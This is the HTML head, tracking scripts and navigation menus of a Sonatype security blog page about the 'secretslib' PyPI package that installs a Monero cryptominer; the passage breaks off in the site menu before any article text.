<!doctype html><!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-us" > <![endif]--><!--[if IE 7]>    <html class="no-js lt-ie9 lt-ie8" lang="en-us" >        <![endif]--><!--[if IE 8]>    <html class="no-js lt-ie9" lang="en-us" >               <![endif]--><!--[if gt IE 8]><!--><html class="no-js" lang="en-us"><!--<![endif]--><head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="author" content="Ax Sharma">
    <meta name="description" content="Sonatype identified a 'secretslib' PyPI package that covertly installs cryptominers on Linux systems.">
    <meta name="generator" content="HubSpot">
    <title>PyPI Package 'secretslib' Drops Fileless Linux Malware to Mine Monero</title>
    <link rel="shortcut icon" href="https://blog.sonatype.com/hubfs/SON_logo_favicon.png">
    

    <script src="/hs/hsstatic/jquery-libs/static-1.1/jquery/jquery-1.7.1.js"></script>
<script>hsjQuery = window['jQuery'];</script>
    <meta property="og:description" content="Sonatype identified a 'secretslib' PyPI package that covertly installs cryptominers on Linux systems.">
    <meta property="og:title" content="PyPI Package 'secretslib' Drops Fileless Linux Malware to Mine Monero">
    <meta name="twitter:description" content="Sonatype identified a 'secretslib' PyPI package that covertly installs cryptominers on Linux systems.">
    <meta name="twitter:title" content="PyPI Package 'secretslib' Drops Fileless Linux Malware to Mine Monero">

    

    
    <style>
a.cta_button{-moz-box-sizing:content-box !important;-webkit-box-sizing:content-box !important;box-sizing:content-box !important;vertical-align:middle}.hs-breadcrumb-menu{list-style-type:none;margin:0px 0px 0px 0px;padding:0px 0px 0px 0px}.hs-breadcrumb-menu-item{float:left;padding:10px 0px 10px 10px}.hs-breadcrumb-menu-divider:before{content:'›';padding-left:10px}.hs-featured-image-link{border:0}.hs-featured-image{float:right;margin:0 0 20px 20px;max-width:50%}@media (max-width: 568px){.hs-featured-image{float:none;margin:0;width:100%;max-width:100%}}.hs-screen-reader-text{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}
</style>

<link rel="stylesheet" href="https://blog.sonatype.com/hs-fs/hub/1958393/hub_generated/module_assets/40666130714/1647369889030/module_40666130714_MEGA_Menu_Code_Jan_2021_NEW_MEGA.min.css">
<link rel="stylesheet" href="/hs/hsstatic/AsyncSupport/static-1.122/sass/comments_listing_asset.css">
    

    

<meta name="viewport" content="width=device-width, initial-scale=1">
<script type="text/javascript" src="https://blog.sonatype.com/hs-fs/hub/1958393/hub_generated/template_assets/3937994511/1591984849376/In_Use/In_Use_JS/Form-quality-check.min.js"></script>

<!-- Add fancybox support -->

<script type="text/javascript" src="https://blog.sonatype.com/hubfs/Plugins/fancybox/lib/jquery.mousewheel-3.0.6.pack.js"></script>

<link rel="stylesheet" href="https://blog.sonatype.com/hubfs/Plugins/fancybox/source/jquery.fancybox.css?v=2.1.5" type="text/css" media="screen">
<script type="text/javascript" src="https://blog.sonatype.com/hubfs/Plugins/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

<!-- Optionally add helpers - button, thumbnail and/or media -->

<link rel="stylesheet" href="https://blog.sonatype.com/hubfs/Plugins/fancybox/source/helpers/jquery.fancybox-buttons.css?v=1.0.5" type="text/css" media="screen">

<script type="text/javascript" src="https://blog.sonatype.com/hubfs/Plugins/fancybox/source/helpers/jquery.fancybox-buttons.js?v=1.0.5"></script>

<script type="text/javascript" src="https://blog.sonatype.com/hubfs/Plugins/fancybox/source/helpers/jquery.fancybox-media.js?v=1.0.6"></script>

<link rel="stylesheet" href="https://blog.sonatype.com/hubfs/Plugins/fancybox/source/helpers/jquery.fancybox-thumbs.css?v=1.0.7" type="text/css" media="screen">

<script type="text/javascript" src="https://blog.sonatype.com/hubfs/Plugins/fancybox/source/helpers/jquery.fancybox-thumbs.js?v=1.0.7"></script>

<script type="text/javascript">
    $(document).ready(function() {
        $('.fancybox')
            .fancybox({
                openEffect : 'none',
                closeEffect : 'none',
                prevEffect : 'none',
                nextEffect : 'none',

                arrows : false,
                helpers : {
                    media : {},
                    buttons : {}
                }
            });
});
</script>
<meta name="google-site-verification" content="YwJUaTig7dTU7VWHgOIGs-O5zEmCFqLjIC4hFfkLAyA">
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TT8R4P');</script>
<!-- End Google Tag Manager -->
<script src="https://use.fonticons.com/cae69742.js"></script>

<!-- Start of Async Drift Code -->
<script>
"use strict";

!function() {
  var t = window.driftt = window.drift = window.driftt || [];
  if (!t.init) {
    if (t.invoked) return void (window.console && console.error && console.error("Drift snippet included twice."));
    t.invoked = !0, t.methods = [ "identify", "config", "track", "reset", "debug", "show", "ping", "page", "hide", "off", "on" ], 
    t.factory = function(e) {
      return function() {
        var n = Array.prototype.slice.call(arguments);
        return n.unshift(e), t.push(n), t;
      };
    }, t.methods.forEach(function(e) {
      t[e] = t.factory(e);
    }), t.load = function(t) {
      var e = 3e5, n = Math.ceil(new Date() / e) * e, o = document.createElement("script");
      o.type = "text/javascript", o.async = !0, o.crossorigin = "anonymous", o.src = "https://js.driftt.com/include/" + n + "/" + t + ".js";
      var i = document.getElementsByTagName("script")[0];
      i.parentNode.insertBefore(o, i);
    };
  }
}();
drift.SNIPPET_VERSION = '0.3.1';
drift.load('99hz8ezzd9gu');
</script>

<!-- End of Async Drift Code -->

<script id="Cookiebot" src="https://consent.cookiebot.com/uc.js" data-cbid="9958dd21-8504-4dbf-8e2f-e736792a6843" type="text/javascript" async></script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-137036301-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-137036301-1');
</script>
<link rel="stylesheet" data-href="//cdn2.hubspot.net/hub/1958393/hub_generated/template_assets/68016447380/1648666483336/In_Use/In_Use_CSS/css/modules_combine.min.css" href="https://blog.sonatype.com/hs-fs/hub/1958393/hub_generated/template_assets/68016447380/1648666483336/In_Use/In_Use_CSS/css/modules_combine.min.css">
<link rel="amphtml" href="https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero?hs_amp=true">

<meta property="og:image" content="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-open-source-components-dependencies-100.jpg#keepProtocol">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="600">

<meta name="twitter:image" content="https://blog.sonatype.com/hubfs/Blog%20Images%202022/blog-open-source-components-dependencies-100.jpg#keepProtocol">


<meta property="og:url" content="https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:creator" content="@Ax_Sharma">

<link rel="canonical" href="https://blog.sonatype.com/pypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero">

<meta property="og:type" content="article">
<link rel="alternate" type="application/rss+xml" href="https://blog.sonatype.com/rss.xml">
<meta name="twitter:domain" content="blog.sonatype.com">
<script src="//platform.linkedin.com/in.js" type="text/javascript">
    lang: en_US
</script>

<meta http-equiv="content-language" content="en-us">
<link rel="stylesheet" href="//cdn2.hubspot.net/hub/7052064/hub_generated/template_assets/1660570678741/hubspot/hubspot_default/shared/responsive/layout.min.css">
<link rel="stylesheet" href="https://blog.sonatype.com/hs-fs/hub/1958393/hub_generated/template_assets/3797839657/1655328048400/In_Use/In_Use_CSS/default/hs_default_custom_style.css">

<link rel="stylesheet" href="https://blog.sonatype.com/hs-fs/hub/1958393/hub_generated/template_assets/5296081041/1635794559809/In_Use/In_Use_CSS/Updates-Fall-2017.min.css">


    <style>
  
   .blog-2018 .blog-section ul li {
    line-height: 29px;
    margin-bottom: 7px;
  }
.no_results {
    display: none;
}
.body-container .tabber-tabs{
    border-bottom:1px solid #ddd;
    list-style:none;
    padding:0;
    margin:0 0 -2px;
}
.tabber-tabs>li {
    float:left;
    width:170px;
}
.tabber-tabs>li>a {
    padding-right:12px;
    padding-left:12px;
    margin-right:2px;
    line-height:14px;
    padding-top:8px;
    padding-bottom:8px;
    line-height:20px;
    border-bottom:1px solid #ddd;
    text-decoration:none;
    display:block;
    font-size:18px;
}
.tabber-tabs>.active>a,.tabber-tabs>.active>a:hover,.tabber-tabs>.active>a:focus{
    color:#555;
    cursor:default;
    background-color:#fff;
    border-bottom:3px solid #3b4d96;
}
.tabber-content {
    background:#fff;
    padding:8px;

}
.body-container .tabber-content ul {
    padding:0;
    margin:0;
}
.tabber-content .block h3{
    display:none;
}
.tabber-wrap {
 
 }
.tabber-post-image {
    max-width: 100%;
    object-fit: cover;
    object-position: 0;
    height: 80px;
    width: 100%;  
  }
.tabber-post-heading {
  font-size:18px;
  line-height:21px;
  }
  p {
    margin-top: 0px;
}
  .blog-2018 h2 {
    color: #3b4d96;
    margin-bottom: 5px;
    line-height: 1.2;
    margin-top: 40px;
}
  .blog-2018 h3 {
    font-size: 130%;
    margin-bottom: 0px;
    margin-top: 30px;
}
  .blog-2018.hs-blog-post .sonatype-section>.row-fluid-wrapper .about-author-sec {
    margin-top: 20px;
    border: none;
    background: #F2F8FC;
  }
   .blog-2018.hs-blog-post .sonatype-section>.row-fluid-wrapper .about-author-sec p {
    font-size: 16px;
    font-family: "Proxima Nova Medium";
  }
  .blog-2018 .blog-section .post-header h1 {
    line-height: 53px;
    margin-bottom: 0px;
  }
 .blog-2018 .blog-section a, a:active, a:focus, a:visited  {
    font-family: "Proxima Nova Semibold";
}

@media (max-width:1350px) and (min-width:767px) {
  .tabber-tabs>li {
    width:125px;
  }  
}
@media (max-width:480px) {
  .tabber-tabs>li {
    width:125px;
  }  
}
</style>
    

</head>
<body class="blog-2018   hs-content-id-81600643666 hs-blog-post hs-blog-id-3737438004" style="">
<!--  Added by AdRoll integration -->
<script type="text/javascript">
  adroll_adv_id = "LVE6K7UX6ZF3TJCF5YYLLW";
  adroll_pix_id = "QDMEQXRCGJGFVFHP7PP7BL";
  var _hsp = window._hsp = window._hsp || [];
  (function () {
      var _onload = function(){
          if (document.readyState && !/loaded|complete/.test(document.readyState)){setTimeout(_onload, 10);return}
          if (!window.__adroll_loaded){__adroll_loaded=true;setTimeout(_onload, 50);return}
          _hsp.push(['addPrivacyConsentListener', function(consent) { if (consent.allowed || (consent.categories && consent.categories.advertisement)) {
            var scr = document.createElement("script");
            var host = (("https:" == document.location.protocol) ? "https://s.adroll.com" : "http://a.adroll.com");
            scr.setAttribute('async', 'true');
            scr.type = "text/javascript";
            scr.src = host + "/j/roundtrip.js";
            ((document.getElementsByTagName('head') || [null])[0] ||
                document.getElementsByTagName('script')[0].parentNode).appendChild(scr);
          }}]);
      };
      if (window.addEventListener) {window.addEventListener('load', _onload, false);}
      else {window.attachEvent('onload', _onload)}
  }());
</script>

<!-- /Added by AdRoll integration -->

    <div class="header-container-wrapper">
    <div class="header-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-global_group " style="" data-widget-type="global_group" data-x="0" data-w="12">
<div class="" data-global-widget-path="generated_global_groups/3906896744.html"><div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell fixed-nav-margin" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell header-positioning" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-3 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell sonatype-secondary-header sonatype-section" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-4 ">
<div class="row-fluid ">
<div class="span5 widget-span widget-type-rich_text sonatype-news" style="" data-widget-type="rich_text" data-x="0" data-w="5">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_14567894788182" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="rich_text"></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
<div class="span2 widget-span widget-type-space " style="" data-widget-type="space" data-x="5" data-w="2">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1525102574142455" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_space" style="" data-hs-cos-general-type="widget" data-hs-cos-type="space"></span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
<div class="span5 widget-span widget-type-menu sonatype-secondary-nav" style="" data-widget-type="menu" data-x="7" data-w="5">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1458689972919765" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="menu"><div id="hs_menu_wrapper_module_1458689972919765" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="Secondary menu" data-menu-id="64615697496" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://blog.sonatype.com" role="menuitem">Blog</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://dev.sonatype.com/" role="menuitem">DevZone</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/contactus" role="menuitem">Contact Us</a></li>
 </ul>
</div></span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-5 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell sonatype-section sonatype-primary-header" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-6 ">
<div class="row-fluid ">


  <div class="span2 widget-span widget-type-logo sonatype-primary-nav-logo" style="" data-widget-type="logo" data-x="0" data-w="3">
  <div class="cell-wrapper layout-widget-wrapper">
  <span id="hs_cos_wrapper_module_14567894788185" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_logo" style="" data-hs-cos-general-type="widget" data-hs-cos-type="logo">
    <a href="https://www.sonatype.com/" id="hs-link-module_14567894788185" style="border-width:0px;border:0px;">
      <img class="hs-image-widget " data-src="https://www.sonatype.com/hs-fs/hubfs/SON_logo_main@2x%20copy%20trimmed.png?width=165&amp;name=SON_logo_main@2x%20copy%20trimmed.png" style="width:165px;border-width:0px;border:0px;" width="165" alt="Sonatype" title="Sonatype" srcset="https://blog.sonatype.com/hs-fs/hubfs/SON_logo_main@2x%20copy%20trimmed.png?width=83&amp;name=SON_logo_main@2x%20copy%20trimmed.png 83w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_main@2x%20copy%20trimmed.png?width=165&amp;name=SON_logo_main@2x%20copy%20trimmed.png 165w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_main@2x%20copy%20trimmed.png?width=248&amp;name=SON_logo_main@2x%20copy%20trimmed.png 248w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_main@2x%20copy%20trimmed.png?width=330&amp;name=SON_logo_main@2x%20copy%20trimmed.png 330w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_main@2x%20copy%20trimmed.png?width=413&amp;name=SON_logo_main@2x%20copy%20trimmed.png 413w, https://blog.sonatype.com/hs-fs/hubfs/SON_logo_main@2x%20copy%20trimmed.png?width=495&amp;name=SON_logo_main@2x%20copy%20trimmed.png 495w" sizes="(max-width: 165px) 100vw, 165px"></a></span></div><!--end layout-widget-wrapper -->
  </div>


<div class="span10 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="2" data-w="10">

<div class="row-fluid-wrapper row-depth-2 row-number-1 ">
<div class="row-fluid ">
<nav class="sonatype-primary-nav mobile-version">
  
<div class="span12 widget-span widget-type-menu sonatype-mega mobile-navigation" style="" data-widget-type="menu" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1503095781726111" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="menu"><div id="hs_menu_wrapper_module_1503095781726111" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="Sonatype - v1 -Launch- - March 2016" data-menu-id="40788459105" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1 hs-item-has-children" role="none"><a href="javascript:;" aria-haspopup="true" aria-expanded="false" role="menuitem">Products</a>
   <ul role="menu" class="hs-menu-children-wrapper">
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading" style="margin-top:0;">Software composition Analysis</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/lifecycle?topnav=true" role="menuitem"><span style="margin-top:-14px; font-size:15px;">Nexus Lifecycle<br><span class="small-menu-text">Eliminate OSS risk across the entire SDLC</span></span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/firewall?topnav=true" role="menuitem">Nexus Firewall<br><span class="small-menu-text">Protect your artifact repository from OSS risk</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading" style="margin-top:0;">Code Quality Analysis</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/sonatype-lift?topnav=true" role="menuitem"><span style="margin-top:-14px; font-size:15px;">Sonatype Lift<br><span class="small-menu-text">Find and fix security, performance, and reliability bugs during code review.</span></span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading">Repository MANAGEMENT </span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/nexus-repository?topnav=true" role="menuitem"><span style="margin-top:-14px; font-size:15px;">Nexus Repository<br><span class="small-menu-text">Manage binaries and build artifacts</span></span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading">CONTAINER SECURITY</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/container?topnav=true" role="menuitem"><span style="margin-top:-14px; font-size:15px;">Nexus Container<br><span class="small-menu-text">Identify and remediate OSS risk in containers for build and run-time protection</span></span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/software-supply-chain-management?topnav=true" role="menuitem"><span class="mega-mobile-heading">COMPLETE PLATFORM</span><br><span class="small-menu-text" style="margin-top:-14px; ">Automate your software supply chain security against every attack with Sonatype’s suite of products.</span></a></li>
   </ul></li>
  <li class="hs-menu-item hs-menu-depth-1 hs-item-has-children" role="none"><a href="javascript:;" aria-haspopup="true" aria-expanded="false" role="menuitem">Solutions</a>
   <ul role="menu" class="hs-menu-children-wrapper">
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading" style="margin-top:0;">For Professionals</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/software-developers?topnav=true" role="menuitem">Developers</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/appsec-professionals?topnav=true" role="menuitem">Application Security</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/devsecops-leaders?topnav=true" role="menuitem">DevSecOps</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/legal-and-compliance-officers?topnav=true" role="menuitem">Legal &amp; Compliance</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading">For Industries</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/government?topnav=true" role="menuitem"> Government</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/banking-and-financial-services?topnav=true" role="menuitem"> Financial Services</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/manufacturing?topnav=true" role="menuitem">Manufacturing</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/technology-and-software?topnav=true" role="menuitem">Technology</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/solutions/healthcare?topnav=true" role="menuitem">Healthcare</a></li>
   </ul></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/pricing?topnav=true" role="menuitem">Pricing</a></li>
  <li class="hs-menu-item hs-menu-depth-1 hs-item-has-children" role="none"><a href="javascript:;" aria-haspopup="true" aria-expanded="false" role="menuitem">Resources</a>
   <ul role="menu" class="hs-menu-children-wrapper">
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading" style="margin-top:0;">Content</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/resources/springshell-exploit-resource-center" role="menuitem">Spring4Shell Resource Center</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/resources/log4j-vulnerability-resource-center" role="menuitem">Log4j Resource Center</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/resources/whitepapers-reports-and-books?topnav=true" role="menuitem">Whitepapers &amp; eBooks</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/resources/webinars?topnav=true" role="menuitem">Webinars</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://video.sonatype.com/?topnav=true" role="menuitem" target="_blank" rel="noopener">Videos</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/resources/upcoming-events?topnav=true" role="menuitem">Events</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading">INtegrations &amp; FREE TOOLS </span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/integrations?topnav=true" role="menuitem">Sonatype Integrations</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://ossindex.sonatype.org/?__hstc=31049440.d5ab0fbc6553211f149a678e47fa8ad9.1538587991933.1611152721095.1611169623363.1832&amp;__hssc=31049440.11.1611169623363&amp;__hsfp=3828529911" role="menuitem">Sonatype OSS Index</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/vulnerability-scanner?topnav=true" role="menuitem">Nexus Vulnerability Scanner</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/free-developer-tools?topnav=true" role="menuitem">Free Developer Tools</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading">CUSTOMER PORTAL</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://my.sonatype.com/?topnav=true" role="menuitem" target="_blank" rel="noopener"><span style="margin-top:-14px;font-size:14px;">My Sonatype<br><span class="small-menu-text">Customer support, product guides &amp; documentation, online courses, community, and more.</span></span></a></li>
   </ul></li>
  <li class="hs-menu-item hs-menu-depth-1 hs-item-has-children" role="none"><a href="javascript:;" aria-haspopup="true" aria-expanded="false" role="menuitem">Company</a>
   <ul role="menu" class="hs-menu-children-wrapper">
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="javascript:;" role="menuitem"><span class="mega-mobile-heading" style="margin-top:0;">About Us</span></a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/company/?topnav=true" role="menuitem">About Sonatype</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/products/intelligence?topnav=true" role="menuitem">About Nexus Intelligence</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/partners?topnav=true" role="menuitem">Partner Program</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/company/careers?topnav=true" role="menuitem">Careers at Sonatype</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/press-releases?topnav=true" role="menuitem">Press Releases</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/company/media?topnav=true" role="menuitem">Media </a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://blog.sonatype.com/?topnav=true" role="menuitem">Blog</a></li>
    <li class="hs-menu-item hs-menu-depth-2" role="none"><a href="https://www.sonatype.com/contactus?topnav=true" role="menuitem"><span class="mega-mobile-heading">Contact Us</span></a></li>
   </ul></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://dev.sonatype.com/" role="menuitem">DevZone <i class="fa fa-external-link"></i></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/request-a-personalized-demo?topnav=true" role="menuitem">BOOK A DEMO</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="#chat-now" role="menuitem"><span class="drift-nav-chat">CHAT NOW</span></a></li>
 </ul>
</div></span></div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
                 
</nav>
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-2 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell desktop-navigation" style="position:relative;" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-2 row-number-3 ">
<div class="row-fluid ">
<nav class="sonatype-primary-nav">
  
<div class="span12 widget-span widget-type-menu sonatype-mega" style="" data-widget-type="menu" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_14576409481131480" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="menu"><div id="hs_menu_wrapper_module_14576409481131480" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="Sonatype Solutions Menu" data-menu-id="28631988575" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="javascript:;" role="menuitem"><span class="mega-item one">Products</span></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="javascript:;" role="menuitem"><span class="mega-item two">Solutions</span></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/pricing?topnav=true" role="menuitem">Pricing</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="javascript:;" role="menuitem"><span class="mega-item three">Resources</span></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="javascript:;" role="menuitem"><span class="mega-item four">Company</span></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/request-a-personalized-demo?topnav=true" role="menuitem">BOOK A DEMO</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="#chat-now" role="menuitem"><span class="drift-nav-chat">CHAT NOW</span></a></li>
 </ul>
</div></span></div><!--end layout-widget-wrapper -->
   </div><!--end widget-span -->
                     
</nav>
    </div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-2 row-number-4 ">
<div class="row-fluid ">
<div class="mega-menu one">
  
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-2 row-number-5 ">
    <div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1612478720543859" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="mega-container ">
  <div class="menu-title">
   
      <div class="themenus">
        <div class="menu-col1 mega-links two_col">
          
            <div id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><h4>Software composition analysis</h4></div>
            <span id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612478720543859_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
